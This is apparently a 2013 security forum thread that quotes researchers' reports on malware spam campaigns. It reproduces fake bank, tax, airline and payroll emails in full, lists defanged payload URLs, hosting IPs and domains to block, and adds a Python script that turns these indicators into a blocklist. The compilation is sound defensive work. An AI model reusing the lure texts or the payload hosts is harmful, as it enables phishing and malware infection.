mnt-by: OVH-MNT
source: RIPE # Filtered
"MMuskatov" was involved in this attack too, and a quick inspection of 5.135.67.160/28 doesn't look promising, you might want to block it and 5.135.67.144/28 and 5.135.67.192/28 as well. A deeper analysis is in progress."
* https://www.google.com/safebrowsing/diagnostic?site=AS:16276
"... over the past 90 days, 7580 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-02-08, and the last time suspicious content was found was on 2013-02-08... we found 518 site(s) on this network... that appeared to function as intermediaries for the infection of 3631 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 1465 site(s)... that infected 7340 other site(s)..."
___
Fake ACH Batch Download Notification emails
- http://security.intuit.com/alert.php?a=71
2/8/13 - "People are receiving fake emails with the title "ACH Batch Download Notification". Below is a copy of the email people are receiving, including the mistakes shown.
Refund check in the amount of $4,370.00 for
The following ACH batch has been submitted for processing.
Initiated By: colleen
Initiated Date & Time: Fri, 8 Feb 2013 21:38:16 +0600 Batch ID: 7718720 Batch Template Name: PAYROLL
Please view the attached file to review the transaction details.
This is the end of the fake email..."
___
Fake BBB SPAM / madcambodia .net
- http://blog.dynamoo.com/2013/02/bbb-spam-madcambodianet.html
8 Feb 2013 - "This fake BBB spam leads to malware on madcambodia .net:
Date: Fri, 8 Feb 2013 11:55:55 -0500 [11:55:55 EST]
From: Better Business Bureau [notify @bbb .org]
Subject: BBB details about your cliente's pretense ID 43C796S77
Better Business Bureau ©
Start With Trust ©
Thu, 7 Feb 2013
RE: Issue No. 43C796S77
[redacted]
The Better Business Bureau has been booked the above mentioned claim letter from one of your purchasers in respect of their business contacts with you. The detailed description of the consumer's concern are available for review at a link below. Please pay attention to this subject and let us know about your judgment as soon as possible.
We pleasantly ask you to visit the GRIEVANCE REPORT to reply on this claim.
We awaits to your prompt response.
Best regards
Luis Davis
Dispute Advisor
Better Business Bureau
3073 Wilson Blvd, Suite 600 Arlington, VA 23501
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277
This note was sent to [redacted]. Don't want to receive these emails anymore? You can unsubscribe
The malicious payload is at [donotclick]madcambodia .net/detects/review_complain.php (report here) hosted on:
175.121.229.209 (Hanaro Telecom, Korea)
198.144.191.50 (Chicago VPS, US) ..."
___
Fake ADP SPAM / 048575623_02082013 .zip
- http://blog.dynamoo.com/2013/02/adp-spam-04857562302082013zip.html
8 Feb 2013 - "This fake ADP spam comes with a malicious attachment:
Date: Fri, 8 Feb 2013 18:26:05 +0100 [12:26:05 EST]
From: "ops_invoice @adp .com" [ops_invoice @adp .com]
Subject: ADP Payroll Invoice for week ending 02/08/2013 - 01647
Your ADP Payroll invoice for last week is attached for your review. If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Thank you for choosing ADP Payroll.
Important: Please do not respond to this message. It comes from an unattended mailbox.
In this case there was a ZIP file called 048575623_02082013 .zip (this may vary) with an attachment 048575623_02082013 .exe designed to look like a PDF file. VirusTotal* identifies it as a Zbot variant. According to ThreatExpert**, the malware attempts to connect to the following hosts:
eyon-neos .eu
quest.social-neos .eu
social-neos .eu
These may be legitimate hacked domains, but if you are seeing unexpected traffic going to them then it could be a Zbot indicator.
* https://www.virustotal.com/file/d961194f9691fdde3d7ce2b1a49781ddc2df88136c62238c02268c2566aea288/analysis/1360370000/
File name: 048575623_02082013.exe
Detection ratio: 17/45
Analysis date: 2013-02-09
** http://www.threatexpert.com/report.aspx?md5=22fe0ab14da8c14d1e0342013e5d0ad0
:fear: :mad:
AplusWebMaster
2013-02-11, 12:26
FYI...
Fake "Support Center" SPAM / phticker .com
- http://blog.dynamoo.com/2013/02/support-center-spam-phtickercom.html
11 Feb 2013 - "Not malware this time, but this fake "Support Center" spam leads to a fake pharma site at phticker .com:
Date: Mon, 11 Feb 2013 06:13:52 -0700
From: "Brinda Wimberly" [noreply @mdsconsulting .be]
Subject: Support Center
Welcome to Help Support Center
Hello,
You have been successfully registered in our Ticketing System
Please, login and check status of your ticket, or report new ticket here
See All tickets
Go To Profile
This message was sent to [redacted]. Should you have any questions, or if you believe that you have received this in error please contact us at support center.
The site appears to be clean from a malware perspective and is hosted on 171.25.190.246 (Verus AS, Latvia) along with other fake pharma sites..."
___
Something evil on 46.163.79.209
- http://blog.dynamoo.com/2013/02/something-evil-on-4616379209.html
11 Feb 2013 - "The following sites are connected with some ADP-themed malware that has been doing the rounds for the past few days. As far as I can tell, they are some sort of download server for this malware, hosted on 46.163.79.209 (Host Europe, Germany), it all looks quite nasty.
social-neos .eu
cloud.social-neos .eu
quest.social-neos .eu
archiv.social-neos .eu
eyon-neos .eu
international.eyon-neos .eu
ns.eyon-neos .eu
euroherz.eyon-neos .eu
The domains look like they might be legitimate ones that have been hijacked, nonetheless blocking them would be an excellent move."
___
Fake Citi Group SPAM
- http://www.hotforsecurity.com/blog/spammed-malware-campaign-targets-citi-group-customers-5322.html
Feb 11, 2013 - "... it’s time Citi clients keep an eye open for e-mails that read “You have received a secure message” inviting them to read the message by opening the attachments securedoc .html...
> http://www.hotforsecurity.com/wp-content/uploads/2013/02/Spammed-Malware-Campaign-Targets-Citi-Group-Customers.png
The emails include a link and an attachment. While the link is harmless, taking receivers to the legitimate Citi page, the attachment is a password stealer that opens a backdoor for remote attackers. Some instances appear to also download components of the BlackHole or ZeuS exploit kits. Untrained eyes could fall for this trick, since these e-mails are written in good English, with decent grammar and harmless-looking attachments. Of the countless ways of infecting a computer, spam delivering malware continues to pay off despite restless efforts of media and the security community. Infecting PCs via spam proves an efficient dissemination method, since users are still caught off-guard by malicious links or attachments such as this message addressed to Citi Group clients..."
___
Fake British Airways SPAM / epianokif .ru
- http://blog.dynamoo.com/2013/02/british-airways-spam-epianokifru.html
11 Feb 2013 - "This fake British Airways spam leads to malware on epianokif .ru:
Date: Mon, 11 Feb 2013 11:30:39 +0330
From: JamesTieszen @[victimdomain .com]
Subject: British Airways E-ticket receipts
Attachments: E-Ticket-N234922XM .htm
e-ticket receipt
Booking reference: DZ87548418
Dear,
Thank you for booking with British Airways.
Ticket Type: e-ticket
This is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for your booking.
Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file)
Yours sincerely,
British Airways Customer Services
British Airways may monitor email traffic data and also the content of emails, where permitted by law, for the purposes of security and staff training and in order to prevent or detect unauthorised use of the British Airways email system.
British Airways Plc is a public limited company registered in England and Wales. Registered number: 74665737. Registered office: Waterside, PO Box 365, Harmondsworth, West Drayton, Middlesex, England, UB7 0GB.
How to contact us
Although we are unable to respond to individual replies to this email we have a comprehensive section that may help you if you have a question about your booking or travelling with British Airways.
If you require further assistance you may contact us
If you have received this email in error
This is a confidential email intended only for the British Airways Customer appearing as the addressee. If you are not the intended recipient please delete this email and inform the snder as soon as possible. Please note that any copying, distribution or other action taken or omitted to be taken in reliance upon it is prohibited and may be unlawful.
The malicious payload is at [donotclick]epianokif .ru:8080/forum/links/column.php (report here) hosted on:
82.148.98.36 (Qatar Telecom, Qatar)
195.210.47.208 (PS Internet Company, Kazakhstan)
202.72.245.146 (Railcom, Mongolia) ..."
___
Fake NACHA SPAM / albaperu .net
- http://blog.dynamoo.com/2013/02/nacha-spam-albaperunet.html
11 Feb 2013 - "This fake NACHA spam leads to malware on albaperu .net:
Date: Mon, 11 Feb 2013 11:39:03 -0500 [11:39:03 EST]
From: ACH Network [reproachedwp41 @direct.nacha .org]
Subject: ACH Transfer canceled
Aborted transfer
The ACH process (ID: 838907191379), recently initiated from your checking account (by one of your account members), was reversed by the other financial institution.
Transaction ID: 838907191379
Reason of Cancellation See detailed information in the despatch below
Transaction Detailed Report RP838907191379.doc (Microsoft Word Document)
13150 Sunrise Drive, Suite 100 Herndon, VA 20172 (703) 561-1600
2013 NACHA - The Electronic Payments Association
The malicious payload is at [donotclick]albaperu .net/detects/case_offices.php (report here) hosted on:
175.121.229.209 (Hanaro Telecom, Korea)
198.144.191.50 (Chicago VPS, US)..."
___
Something evil on 46.165.206.16
- http://blog.dynamoo.com/2013/02/something-evil-on-4616520616.html
11 Feb 2013 - "This is a little group of fake analytics sites containing malware (for example*), hosted on 46.165.206.16 (Leaseweb, Germany**). Sites listed in -red- have already been tagged by Google Safe Browsing diagnostics, presumably the others have stayed below the radar.
adstat150 .com
cexstat20 .com
katestat77 .us
kmstat505 .us
kmstat515 .us
kmstat530 .com
lmstat450 .com
mptraf11 .info
mptraf2 .info
mxstat205 .us
mxstat570 .com
mxstat740 .com
mxstat760 .com
rxtraf25 .ru
rxtraf26 .ru
skeltds .us
vmstat100 .com
vmstat120 .com
vmstat140 .com
vmstat210 .com
vmstat230 .com
vmstat320 .com ..."
* http://urlquery.net/report.php?id=738388
Diagnostic page for AS16265 (LEASEWEB)
** https://www.google.com/safebrowsing/diagnostic?site=AS:16265
"... over the past 90 days, 3350 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-02-12, and the last time suspicious content was found was on 2013-02-12... we found 1006 site(s) on this network... that appeared to function as intermediaries for the infection of 3958 other site(s)... We found 1567 site(s)... that infected 6879 other site(s)..."
:fear::mad:
AplusWebMaster
2013-02-12, 23:22
FYI...
Fake IRS SPAM / micropowerboating .net
- http://blog.dynamoo.com/2013/02/changelog-spam-emaianemru.html
12 Feb 2013 - "This fake IRS spam leads to malware on micropowerboating .net:
Date: Tue, 12 Feb 2013 22:06:55 +0800
From: Internal Revenue Service [damonfq43 @taxes.irs .gov]
Subject: Income Tax Refund TURNED DOWN
Hereby we have to note that Your State Tax Refund Appeal ({ID: 796839212518), recently has been RETURNED. If you believe that IRS did not properly estimate your case due to misunderstanding of the fact(s), be prepared to serve additional information. You can obtain refusal to accept details and re-submit your appeal by browsing a link below.
Please enter official website for information
Internal Revemue Service
Internal Revenue Services United States, Department of Treasury
9611 Tellus. Av.
Hours of Operation: Monday-Friday, 11:30AM - 16:30PM your local time.
===
Date: Tue, 12 Feb 2013 15:00:35 +0100
From: Internal Revenue Service [zirconiumiag0 @irs .gov]
Subject: Income Tax Refund NOT ACCEPTED
Hereby we hav to inform that Your Income Tax Refund Appeal ({ID: 46303803645929), recently has been CANCELED. If you believe that IRS did not properly estimate your case due to misapprehension of the fact(s), be prepared to equip additional information. You can obtain non-acceptance details and re-submit your appeal by browsing a link below.
Please browse official site for more information
Internal Revemue Service
Internal Revenue Services United States, Department of Treasury
3192 Aliquam Rd.
Hours of Operation: Monday-Friday, 11:30AM - 16:30PM your local time.
===
Date: Tue, 12 Feb 2013 15:13:37 +0100 [09:13:37 EST]
From: Internal Revenue Service [idealizesmtz @informer.irs .gov]
Subject: Income Tax Refund TURNED DOWN
Hereby You notified that Your Income Tax Outstanding transaction Appeal (No: 8984589927661), recently was CANCELED. If you believe that IRS did not properly estimate your case due to misapprehension of the fact(s), be prepared to deliver additional information. You can obtain refusal of acceptance details and re-submit your appeal by using a link below.
Please enter official site for information
Internal Revemue Service
Internal Revenue Services United States, Department of Treasury
P.O. Box 265
Hours of Operation: Monday-Friday, 11:30AM - 16:30PM your local time.
The malicious payload is on [donotclick]micropowerboating .net/detects/pending_details.php (report here) hosted on:
175.121.229.209 (Hanaro Telecom, Korea)
198.144.191.50 (Chicago VPS, US)
The following IPs and domains should be blocked:
175.121.229.209
198.144.191.50
micropowerboating .net
morepowetradersta .com
asistyapipressta .com
uminteraktifcozumler .com
rebelldagsanet .com
madcambodia .net
acctnmrxm .net
capeinn .net
albaperu .net
live-satellite-view .net ..."
___
Fake Changelog SPAM / emaianem .ru
- http://blog.dynamoo.com/2013/02/changelog-spam-emaianemru.html
12 Feb 2013 - "This changelog spam leads to malware on emaianem .ru:
Date: Tue, 12 Feb 2013 09:11:11 +0200
From: LinkedIn Password [password@linkedin.com]
Subject: Re: Changlog 10.2011
Good day,
changelog update - View
L. KIRKLAND
===
Date: Tue, 12 Feb 2013 05:14:54 -0600
From: LinkedIn [welcome @linkedin .com]
Subject: Fwd: Re: Changelog as promised(updated)
Good morning,
as prmised updated changelog - View
L. AGUILAR
The malicious payload is at [donotclick]emaianem .ru:8080/forum/links/column.php and is hosted on the same servers as found here*."
* http://blog.dynamoo.com/2013/02/efax-spam-estipaindoru.html
46.175.224.21 (Maxnet Lukasz Hamerski, Poland)
91.121.57.231 (OVH, France)
202.72.245.146 (Railcom, Mongolia)
___
Something evil on 192.81.129.219
- http://blog.dynamoo.com/2013/02/something-evil-on-19281129219.html
12 Feb 2013 - "It looks like there's a nasty case of the Blackhole Exploit kit on 192.81.129.219 (see example*). The IP is controlled by Linode in the US who have been a bit quiet recently... active domains that I can identify on this IP..."
(Long list at the dynamoo URL above.)
* http://urlquery.net/report.php?id=986474
:fear::mad:
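The block lists quoted above (IPs, "domain .tld" names and "[donotclick]" URLs) are written defanged so nobody clicks them by accident, which also means they cannot be pasted straight into a resolver or firewall. The following is an added example of mine, not code from dynamoo or from this thread: it refangs that notation, separates IPs, CIDR ranges and domains, matches hosts (including subdomains) against the result, and emits BIND response-policy-zone records. The sample indicator lines are constructed in the posts' style for the demo and are not a copy of any one report.

```python
"""
Normalise defanged indicator lists into a blocklist and match hosts against it.
Added example; SAMPLE_IOC_LINES is constructed in the posts' defanging style.
"""
import ipaddress
import re
from dataclasses import dataclass, field

SAMPLE_IOC_LINES = """\
The malicious payload is on [donotclick]micropowerboating .net/detects/pending_details.php (report here*) hosted on:
175.121.229.209 (Hanaro Telecom, Korea)
198.144.191.50 (Chicago VPS, US)
micropowerboating .net
morepowetradersta .com
[donotclick]emaianem .ru:8080/forum/links/column.php
hxxp ://91.218.38.245 /imagedl11.php
Blocking 84.22.96.0/19 is an exceptionally good idea.
File name: khgkg01.exe
"""

IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
CIDR_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}/\d{1,2}$")
DOMAIN_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z]{2,}$", re.I)
# File names such as "khgkg01.exe" look like domains to DOMAIN_RE; drop them by suffix.
NOT_A_HOST = (".php", ".htm", ".html", ".exe", ".zip", ".xls", ".csv", ".txt", ".jpg", ".png")


@dataclass
class Blocklist:
    ips: set = field(default_factory=set)      # ipaddress.IPv4Address values
    nets: list = field(default_factory=list)   # ipaddress.IPv4Network values
    domains: set = field(default_factory=set)  # lower-case names


def refang(line: str) -> str:
    """Undo the posts' defanging so tokens become real hostnames and URLs."""
    t = line.replace("[donotclick]", "")
    t = re.sub(r"\bhxxps?\s*://", "", t, flags=re.I)   # "hxxp ://"        -> ""
    t = re.sub(r"\bhttps?://", "", t, flags=re.I)
    t = re.sub(r"\s+\.(?=[a-z])", ".", t, flags=re.I)  # "evil .ru"        -> "evil.ru"
    t = re.sub(r"\s+:(?=\d)", ":", t)                   # "1.2.3.4 :8080"   -> "1.2.3.4:8080"
    t = re.sub(r"\s+/(?=\S)", "/", t)                   # "1.2.3.4 /x.php"  -> "1.2.3.4/x.php"
    return t


def host_of(token: str) -> str:
    """Reduce 'evil.ru:8080/forum/links/column.php' to 'evil.ru'; keep CIDR ranges whole."""
    token = token.strip("\"'()[],;.*")
    if CIDR_RE.match(token):
        return token
    token = token.split("/", 1)[0]          # drop the path
    return re.sub(r":\d+$", "", token)      # drop the port


def build_blocklist(text: str) -> Blocklist:
    """Collect IPs, CIDR ranges and domains from free text written in the posts' style."""
    bl = Blocklist()
    for line in text.splitlines():
        for tok in refang(line).split():
            h = host_of(tok).lower()
            try:
                if CIDR_RE.match(h):
                    bl.nets.append(ipaddress.ip_network(h, strict=False))
                elif IPV4_RE.match(h):
                    bl.ips.add(ipaddress.ip_address(h))
                elif DOMAIN_RE.match(h) and not h.endswith(NOT_A_HOST):
                    bl.domains.add(h)
            except ValueError:
                pass  # dotted numbers that are not addresses, e.g. version strings
    return bl


def is_blocked(host: str, bl: Blocklist) -> bool:
    """True for a listed IP, an IP inside a listed range, or a listed domain or subdomain of one."""
    h = host.strip().lower().rstrip(".")
    try:
        ip = ipaddress.ip_address(h)
    except ValueError:
        return any(h == d or h.endswith("." + d) for d in bl.domains)
    return ip in bl.ips or any(ip in n for n in bl.nets)


def rpz_records(bl: Blocklist) -> list:
    """Emit the domains as BIND response-policy-zone records (exact name plus wildcard)."""
    out = []
    for d in sorted(bl.domains):
        out.append(f"{d} CNAME .")
        out.append(f"*.{d} CNAME .")
    return out


if __name__ == "__main__":
    bl = build_blocklist(SAMPLE_IOC_LINES)
    print("\n".join(rpz_records(bl)))
    for probe in ("www.micropowerboating.net", "84.22.104.123", "example.com"):
        print(probe, "->", "BLOCK" if is_blocked(probe, bl) else "allow")
```

The subdomain match is deliberate: the campaigns above rotate hostnames under the same registered domain, so matching only the exact name would miss them. Review the extracted domains before deploying an RPZ, since the prose in these posts also names legitimate sites (hosting providers, the researchers' own URLs).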
AplusWebMaster
2013-02-13, 16:50
FYI...
Fake NACHA SPAM / thedigidares .net
- http://blog.dynamoo.com/2013/02/nacha-spam-thedigidaresnet.html
13 Feb 2013 - "This fake NACHA spam leads to malware on thedigidares .net:
Date: Wed, 13 Feb 2013 12:10:27 +0000
From: " NACHA" [limbon@direct .nacha .org]
Subject: Aborted transfer
Canceled transaction
The ACH process (ID: 648919687408), recently sent from your bank account (by you), was canceled by the other financial institution.
Transaction ID: 648919687408
Cancellation Reason Review additional info in the statement below
Transaction Detailed Report Report_648919687408.xls (Microsoft/Open Office Word Document)
13150 Sunrise Street, Suite 100 Herndon, VA 20174 (703) 561-1200
2013 NACHA - The Electronic Payments Association
The malicious payload is at [donotclick]thedigidares .net/detects/irritating-crashed-registers.php (report here*) hosted on:
134.74.14.98 (City College of New York, US)
175.121.229.209 (Hanaro Telecom, Korea)
The following IPs and domains are linked and should be blocked:
134.74.14.98
175.121.229.209
albaperu .net
capeinn .net
thedigidares .net
madcambodia .net
micropowerboating .net
dressaytam .net
acctnmrxm .net
albaperu .net
live-satellite-view .net
dressaytam .net"
* http://urlquery.net/report.php?id=993904
BlackHole v2.0 exploit kit
- http://blog.dynamoo.com/2013/02/nacha-spam-eminakotprru.html
13 Feb 2013 - "More fake NACHA spam, this time leading to malware on eminakotpr .ru:
Date: Wed, 13 Feb 2013 05:24:26 +0530
From: "ACH Network" [risk-management@nacha.org]
Subject: Re: Fwd: ACH Transfer rejected
The ACH transaction, initiated from your checking acc., was canceled.
Canceled transfer:
Transfer ID: FE-65426265630US
Transaction Report: View
August BLUE
NACHA - The National Automated Clearing House Association
The malicious payload is at [donotclick]eminakotpr .ru:8080/forum/links/column.php hosted on:
46.175.224.21 (MAXNET Lukasz Hamerski, Poland)
91.121.57.231 (OVH, France)
202.72.245.146 (Railcom, Mongolia)..."
___
Malware sites to block 13/2/13
- http://blog.dynamoo.com/2013/02/malware-sites-to-block-13213.html
13 Feb 2013 - "These malicious sites appear to be part of a Waledac botnet. I haven't had much time to analyse exactly what is going on, but here is one example from [donotclick]merwiqca .ru/nothing.exe: URLquery, VirusTotal*, Comodo CAMAS, ThreatExpert**.
I'm still working on IP addresses (there are a LOT), but these are the domains that I have managed to identify.."
(Long list [mostly *.ru] at the dynamoo URL above.)
* https://www.virustotal.com/file/a604fb2d0eb7e6a3b637240cd9bc3902756305bed9d474072f6d83e20d1786dd/analysis/1360769367/
File name: khgkg01.exe
Detection ratio: 8/43
Analysis date: 2013-02-13
Behavioural information
TCP connections...
85.121.3.1:80
76.169.151.26:80
195.228.43.24:80
46.162.243.26:80
** http://www.threatexpert.com/report.aspx?md5=100467dc5e2b345030988293dffbdc9a
192.5.5.241
___
- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d
Fake CashPro Online Digital Certificate Notification E-mail Messages - February 13, 2013
Fake Failed Package Delivery Notification E-mail Messages - February 13, 2013
Fake Message Receipt Notification E-mail Messages - February 13, 2013
Fake Western Union Money Transfer Transaction E-Mail Messages - February 13, 2013
Fake Payment Request E-mail Messages - February 13, 2013
Fake Voicemail Message Notification E-mail Messages - February 13, 2013
Fake Turkish Airline Ticket Booking Confirmation E-mail Messages - February 13, 2013
Fake Antiphishing Notification E-mail Messages - February 13, 2013
Fake Bank Transfer Confirmation Notification E-mail Messages - February 13, 2013
Fake Product Order Change Notification E-mail Messages - February 13, 2013
Fake Italian Policy Change Notification E-mail Messages - February 13, 2013
Fake United Parcel Service Shipment Error E-mail Messages - February 13, 2013
(Links and more info available at the cisco URL above.)
___
Fake Bank "Secure Email Notification" SPAM
- http://blog.dynamoo.com/2013/02/first-foundation-bank-secure-email.html
13 Feb 2013 - "It looks a bit like a phish, but this "First Foundation Bank Secure Email Notification" spam has a ZIP file that leads to malware:
Date: Wed, 13 Feb 2013 20:08:46 +0200 [13:08:46 EST]
From: FF-inc Secure Notification [secure.notification @ff-inc .com]
Subject: First Foundation Bank Secure Email Notification - 94JIMEEQ
You have received a secure message
Read your secure message by opening the attachment, secure_mail_94JIMEEQ. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it in a Web browser. To access from a mobile device, forward this message to mobile @res.ff-inc .com to receive a mobile login URL.
If you have concerns about the validity of this message, please contact the sender directly. For questions about secure e-mail encryption service, please contact technical support at 888.795.7643.
2000-2013 First Foundation Inc. All rights reserved.
Attached is a file called secure_mail_94JIMEEQ.zip which expands into.. well, nothing good.. a file called secure_mail_{_Case_DIG}.exe with an icon that is meant to disguise it as an Acrobat file. VirusTotal detection rates* are just 15/45 and the malware is resistant to analysis. Incidentally, emailing mobile @res.ff-inc .com just generates a failure message. Avoid."
* https://www.virustotal.com/file/71b8e44b1e4b05c267d8c7af8f8f6a1294f33cbeb0b202731dde9a67389faa35/analysis/1360795797/
File name: secure_mail_{_Case_DIG}.exe
Detection ratio: 15/45
Analysis date: 2013-02-13
:mad:
AplusWebMaster
2013-02-14, 14:40
FYI...
Something evil on 92.63.105.23
- http://blog.dynamoo.com/2013/02/something-evil-on-926310523.html
14 Feb 2013 - "Looks like a nasty infestation of Blackhole is lurking on 92.63.105.23 (TheFirst-RU, Russia*) - see an example of the nastiness here** (this link is safe to click!). The following domains are present on this address, although there are probably more..."
(Long list at the dynamoo URL above.)
** http://urlquery.net/report.php?id=995495
... Blackholev2 url structure detected
* https://www.google.com/safebrowsing/diagnostic?site=AS:29182
"... over the past 90 days, 606 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-02-14, and the last time suspicious content was found was on 2013-02-14... we found 182 site(s) on this network... that appeared to function as intermediaries for the infection of 652 other site(s)... We found 655 site(s)... that infected 4547 other site(s)..."
___
Top 10 Valentine’s Day Scams...
- http://www.hotforsecurity.com/blog/top-10-valentines-day-scams-cyber-criminals-trick-users-with-fake-limousine-offers-and-online-heart-experts-5357.html
Feb 14, 2013 - "... advises users to stay away from fake limousine offers and online ‘heart experts’ who claim to heal troubled relationships. This type of scam spreads through spam and redirects users to phishing, fraud and malware-infected websites... The bait that tricks men these days includes fake chocolate offers, diamond-like rings, perfumes, personalized gifts, heart-shaped jewelry and replica watches... A fast spreading scam tricks victims to download Valentine’s Day wallpapers which redirect to fraudulent websites. Users are told they won an iPhone 5 and asked for personal details. In the name of Cupid, similar scams circulate on Facebook, too. Valentine’s Day games and Android apps downloaded from unofficial marketplaces such as free love calculators may install adware and malware. Britons should be especially careful with flower offers. Valentine’s Day is not only the busiest day of the year for UK florists, but also for fake ‘flower’ scammers..."
> http://www.hotforsecurity.com/wp-content/uploads/2013/02/top-10-valentines-day-scams-cyber-criminals-trick-users-with-fake-limousine-offers-and-online-heart-experts-1.jpg
___
Malicious URL hits related to “valentine” from January to Feb. 14
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/02/Malicious-URLs-2013.png
Malware detections related to “valentine” from January to Feb. 14
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/02/Malware-Valentines-2013.png
___
Fake 'Facebook blocked' emails serve client-side exploits and malware
- http://blog.webroot.com/2013/02/14/fake-youve-blockeddisabled-your-facebook-account-themed-emails-serve-client-side-exploits-and-malware/
14 Feb 2013 - "Cybercriminals are currently spamvertising two separate campaigns, impersonating Facebook Inc., in an attempt to trick its users into thinking that their Facebook account has been disabled. What these two campaigns have in common is the fact that the client-side exploits serving domains are both parked on the same IP. Once users click on -any- of the links found in the malicious emails, they’re exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised campaign:
> https://webrootblog.files.wordpress.com/2013/02/email_spam_facebook_account_blocked_disabled_exploits_malware_black_hole_exploit_kit.png
... Malicious domain names reconnaissance:
gonita .net – 222.238.109.66 – Email: lockwr @rocketmail .com
able-stock .net – 222.238.109.66
capeinn .net – 222.238.109.66; 198.144.191.50 – Email: softonlines @yahoo .com
Name servers used in the campaign:
Name Server: NS1.HTTP-PAGE .NET
Name Server: NS2.HTTP-PAGE .NET
We’ve already seen the same name servers used in... malicious campaigns...
Responding to 222.238.109.66 are... malicious/fraudulent domains...
Responding to 198.144.191.50 are... malicious domains...
We’ve already seen the same pseudo-random C&C communication characters (EGa+AAAAAA), as well as the same C&C server (173.201.177.77) in... previously profiled campaigns..."
(More detail at the webroot URL above.)
___
Fake HP ScanJet SPAM / eipuonam .ru
- http://blog.dynamoo.com/2013/02/hp-scanjet-spam-eipuonamru.html
14 Feb 2013 - "This fake printer spam leads to malware on eipuonam .ru:
Date: Thu, 14 Feb 2013 -02:00:50 -0800
From: "Xanga" [noreply@xanga.com]
Subject: Fwd: Scan from a HP ScanJet #72551
Attachments: HP_Document.htm
Attached document was scanned and sent
to you using a HP A-39329P.
SENT BY : Ingrid
PAGES : 0
FILETYPE: .HTML [INTERNET EXPLORER/MOZILLA FIREFOX]
The attachment HP_Document.htm contains a script that attempts to direct visitors to [donotclick]eipuonam .ru:8080/forum/links/column.php (report here*) hosted on:
91.121.57.231 (OVH, France)
195.210.47.208 (PS Internet, Kazakhstan)
202.72.245.146 (Railcom, Mongolia)..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1000763
... Detected suspicious URL pattern
___
Fake "Copies of policies" SPAM / ewinhdutik .ru
- http://blog.dynamoo.com/2013/02/copies-of-policies-spam-ewinhdutikru.html
14 Feb 2013 - "This spam leads to malware on ewinhdutik .ru:
Date: Thu, 14 Feb 2013 07:16:28 -0500
From: "Korbin BERG" [ConnorAlmeida @telia .com]
Subject: RE: Korbin - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
Korbin BERG,
===
Date: Thu, 14 Feb 2013 03:30:52 +0530
From: Tagged [Tagged @taggedmail .com]
Subject: RE: KESHIA - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
KESHIA LEVINE,
The malicious payload is at [donotclick]ewinhdutik .ru:8080/forum/links/column.php (report here*) hosted on the same IP addresses as this attack we saw earlier:
- http://blog.dynamoo.com/2013/02/hp-scanjet-spam-eipuonamru.html
91.121.57.231 (OVH, France)
195.210.47.208 (PS Internet, Kazakhstan)
202.72.245.146 (Railcom, Mongolia)"
* http://urlquery.net/report.php?id=1001864
... AS48716** Kazakhstan... suspicious URL pattern
** https://www.google.com/safebrowsing/diagnostic?site=AS:48716
___
Fake HP ScanJet SPAM / 202.72.245.146
- http://blog.dynamoo.com/2013/02/hp-scanjet-spam-20272245146.html
14 Feb 2013 - "This fake printer spam leads to malware on 202.72.245.146:
Date: Thu, 14 Feb 2013 10:10:56 +0000
From: AntonioShapard @hotmail .com
Subject: Fwd: Re: Scan from a Hewlett-Packard ScanJet #6293
Attachments: HP_Document.htm
Attached document was scanned and sent
to you using a HP A-32347P.
SENT BY : TRISH
PAGES : 3
FILETYPE: .HTML [INTERNET EXPLORER/MOZILLA FIREFOX]
===
Date: Thu, 14 Feb 2013 06:07:00 -0800
From: LinkedIn Password [password @linkedin .com]
Subject: Fwd: Scan from a Hewlett-Packard ScanJet 83097855
Attachments: HP_Document.htm
Attached document was scanned and sent
to you using a HP A-775861P.
SENT BY : CARLINE
PAGES : 4
FILETYPE: .HTML [INTERNET EXPLORER/MOZILLA FIREFOX]
The malicious payload is on [donotclick]202.72.245.146 :8080/forum/links/column.php which is a familiar IP address belonging to Railcom in Mongolia. The following malicious websites are also active on the same server..."
(Long list at the dynamoo URL above.)
___
Fake Intuit SPAM / epionkalom .ru
- http://blog.dynamoo.com/2013/02/intuit-spam-epionkalomru.html
14 Feb 2013 - "This fake Intuit spam leads to malware on epionkalom .ru:
Date: Thu, 14 Feb 2013 09:05:48 -0500
From: "Classmates . com" [classmatesemail @accounts.classmates .com]
Subject: Payroll Account Holded by Intuit
Direct Deposit Service Informer
Communicatory Only
We cancelled your payroll on Thu, 14 Feb 2013 09:05:48 -0500.
Finances would be gone away from below account # ending in 2317 on Thu, 14 Feb 2013 09:05:48 -0500
amount to be seceded: 2246 USD
Paychecks would be procrastinated to your personnel accounts on: Thu, 14 Feb 2013 09:05:48 -0500
Log In to Review Operation
Funds are typically left before working banking hours so please make sure you have enough Finances accessible by 12 a.m. on the date Cash are to be seceded.
Intuit must reject your payroll by 4 p.m. Central time, two banking days before your paycheck date or your state would not be paid on time.
QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Regards,
Intuit Payroll Services
The malicious payload is at [donotclick]epionkalom .ru:8080/forum/links/column.php hosted on a bunch of IP addresses that we have seen many, many times before:
91.121.57.231 (OVH, France)
195.210.47.208 (PS Internet, Kazakhstan)
202.72.245.146 (Railcom, Mongolia) ..."
___
